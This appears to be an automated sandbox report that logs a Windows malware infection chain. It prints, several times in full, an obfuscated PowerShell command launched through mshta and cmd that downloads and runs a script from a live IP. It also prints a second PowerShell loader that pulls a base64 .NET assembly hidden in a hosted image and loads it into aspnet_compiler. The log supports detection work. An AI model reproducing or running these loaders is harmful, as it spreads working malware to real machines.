Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_027F9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

17_2_027F9247

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04204062 push ss; ret	8_2_0420406A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04204162 push ds; ret	8_2_0420416A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04204268 pushfd ; ret	8_2_04204271
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040134A pushfd ; retf	13_2_00401353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004012F2 pushfd ; retf	13_2_004012F3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_3_05879719 push eax; ret	17_3_05879725
Source: C:\Windows\explorer.exe	Code function: 18_2_0019A055 push es; iretd	18_2_0019A05D
Source: C:\Windows\explorer.exe	Code function: 18_2_00191405 push esi; ret	18_2_00191407
Source: C:\Windows\explorer.exe	Code function: 18_2_001947A7 push esp; iretd	18_2_001947A8
Source: C:\Windows\explorer.exe	Code function: 18_2_001914D4 push esi; ret	18_2_001914D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F538A7 push esp; iretd	19_2_02F538A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F594E6 push edx; ret	19_2_02F594E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F5967E push ds; retf	19_2_02F59680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA87CE push es; ret	20_2_02CA8A18
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA8EEF push edi; ret	20_2_02CA8EF0
Source: C:\Windows\explorer.exe	Code function: 21_2_005D1405 push esi; ret	21_2_005D1407
